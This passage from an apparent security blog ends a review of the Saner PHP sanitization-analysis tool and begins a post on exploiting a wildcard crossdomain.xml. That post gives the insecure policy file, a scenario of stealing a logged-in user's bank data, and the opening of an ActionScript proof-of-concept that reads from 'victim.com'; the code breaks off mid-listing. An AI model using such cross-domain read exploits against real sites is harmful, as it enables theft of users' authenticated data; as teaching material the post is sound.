<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner uses Mohri and Sporat’s algorithm to model the functions. The automata used in the Mohri and Sporat’s algorithm are not taint aware. In order to get around the limitation, the algorithm was left unmodified and a clever workaround was used to leverage the existing algorithm to propagate taint information. The workaround replaced static strings with empty ones to ensure that static, untainted strings that contain dangerous meta-characters do not lead to false positives. To compensate for the loss of information from static string removal, an over approximation of possible string values was derived based on various modeled functions and the parameters they accept. This approach allowed removal of false negatives.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, in order to determine if a potentially malicious input makes it to a sensitive sink, an intersection is calculated between the automaton that represents the sink’s input and the automaton that contains the set of undesired characters. For every non-empty intersection, the source-sink pair is flagged as a potential true positive and the information is passed to the dynamic analysis phase.</span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguIKRiPjjyd07WvKOq4IfCi_9h1COLn-DOBfFFmE-VuOUPNbiW1vSsN6-UV6IxVcrORit5JqR1ME_DTsx-5TiQXkRl_0oKuww1FKdv-7wWkw5e9VtN6w6DqsrbkzL9QmI0Fb7wjcRnEjL2/s1600/Static_Analysis_graph.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguIKRiPjjyd07WvKOq4IfCi_9h1COLn-DOBfFFmE-VuOUPNbiW1vSsN6-UV6IxVcrORit5JqR1ME_DTsx-5TiQXkRl_0oKuww1FKdv-7wWkw5e9VtN6w6DqsrbkzL9QmI0Fb7wjcRnEjL2/s400/Static_Analysis_graph.jpg" title="" width="391" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Figure 2: Image summarizes the static analysis phase</span></td></tr>
</tbody></table>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<br /></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Dynamic Analysis</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The static phase is conservative and may generate false positives and that requires developers to manually inspect the code to weed out the reported false positives. The dynamic analysis component attempts to automate this analysis by directly executing the custom sanitization routines on a set of malicious inputs and then analyzing the output to determine if the malicious characters were sanitized or not.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After receiving the source-sink pairs from the static analysis component, the dynamic analysis extracts all the nodes pertinent to the custom data sanitization and abstracts out all the other application details. It then calculates sanitization graph for each source-sink pair and uses that information to construct all possible paths from source to sink. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Based on the type of the sink, a test suite (XSS or SQL injection) is selected for evaluation. For example, if the sink forms a portion of a SQL query, SQL injection test suite will be run on the corresponding data flow paths. The final step of the process invokes the PHP interpreter to evaluate the result of executing each block of code using the corresponding test suite. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The results of each test were then analyzed by an oracle function to check for occurrence of particular substrings and the result was categorized as a true positive or a false positive.</span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cSD80o75GIfRB7KoDWGwAueXEQQ9K9TPt2tw6684USCbTKTxv2Np7IgOgthl3VJRyA4VdEon6_XSHQO96LeT-wD9rRdj-ssfWZvvNiv36GyzvqeI3fa73qelMRRLZxmYkZOS7K5NXv4Y/s1600/Dynamic-analysis-flowchart.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cSD80o75GIfRB7KoDWGwAueXEQQ9K9TPt2tw6684USCbTKTxv2Np7IgOgthl3VJRyA4VdEon6_XSHQO96LeT-wD9rRdj-ssfWZvvNiv36GyzvqeI3fa73qelMRRLZxmYkZOS7K5NXv4Y/s400/Dynamic-analysis-flowchart.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Figure 3: Image summarizes the dynamic analysis phase</span></td></tr>
</tbody></table>
<br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Results</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner identified 13 novel vulnerabilities across five open source PHP applications. The time required to perform analysis was in the order of a few minutes for almost all applications.</span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Observations</span></span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner’s dynamic analysis effectiveness is primarily driven by its input test suite which is limited. The whitepaper does not discuss the mutation engines, if any, used for the attack vectors. An intelligent mutation engine can potentially make the tool more effective. Additionally, the tool was written to identify XSS vectors that rely on </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> symbol. Including other XSS injection techniques can also increase the detection rate.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The interesting custom validation bypass attacks that Saner identified and discussed in the paper were Cross Site Scripting attacks and the authors did not discuss any identified SQL injection vulnerability.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dynamic analysis component can also be leveraged to write unit test cases for PHP web applications. I could not find Saner source code and plan to reach out to the authors to check its availability.</span><br />
<br /></div>
</li>
</ol>
<span style="font-family: Calibri; font-size: large; font-weight: bold; line-height: 27px; white-space: pre-wrap;">Nov 8, 2013 Update</span><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">I contacted the authors and it appears that Saner source code was never released and is not traceable.</span><br />
<div>
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com6tag:blogger.com,1999:blog-4663432300421783651.post-39380470074097653682013-08-28T04:00:00.000-07:002013-09-19T14:00:38.244-07:00Exploiting Insecure crossdomain.xml to Bypass Same Origin Policy (ActionScript PoC)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Adobe Flash is among the most popular browser plugins and also ships by default with a couple of popular web browsers. Its widespread prevalence has made it a frequent target of attacks and also been as a vector to launch attacks. One such attack vector is to use Flash for cross-domain data access.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this blog post we will review at a known attack vector and create a Proof of Concept exploit to bypass browser’s Same-origin policy for websites that host an overly permissive cross-domain policy file.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Cross-domain Policy Files</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Flash Player’s default security model enforces the same origin policy similar to contemporary browsers and does not allow cross domain data read operations. However, it can make exception to this rule and disregard its default security model if a website in question hosts a cross-domain policy file (named crossdomain.xml) to allow data access from other domains. Insecurely written cross-domain policy files can expose critical application data over the internet. The example policy file below shows once such example where the website opens itself to read access from every running instance of Flash Player.</span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><cross-domain-policy> </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><allow-access-from domain="*" /> </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></cross-domain-policy></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b id="docs-internal-guid-303d9871-b963-abd6-7f69-fc38c78e978d" style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To understand the impact of such cross-domain policy file, let us consider a scenario where a bank website has such a policy file.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A user logs on to the banking website. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The user then visits another website in different browser tab and that website hosts a malicious Flash file to retrieve user information from the bank website. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When the Flash Player notices an attempt to perform cross-domain read operation, it retrieves crossdomain.xml file from the bank website to discover the permitted operations. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It then sends out a read request to a known bank URL that returns sensitive information like user bank account numbers, account balance etc… </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The browser adds user’s session cookies to the outgoing requests and since the user is logged in, the malicious Flash file is served with critical user information. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Flash file then passes it on to the malicious server.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">The ActionScript exploit code</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I wanted to demonstrate the impact of this vulnerability but could not find a Proof of Concept ActionScript code. After tinkering around with ActionScript and Apache Flex SDK, I had a working PoC which is provided below along with the HTML file that I used to embed the Flash file.</span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">// XDomainXploit.as</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">package {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.display.Sprite;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.events.*;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.net.URLRequestMethod;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.net.URLRequest;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.net.URLLoader;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>public class XDomainXploit extends Sprite {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>public function XDomainXploit() {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>// Target URL from where the data is to be retrieved</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var readFrom:String = "http://victim.com/supersecret";</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var readRequest:URLRequest = new URLRequest(readFrom);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var getLoader:URLLoader = new URLLoader();</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>getLoader.addEventListener(Event.COMPLETE, eventHandler);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>try {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
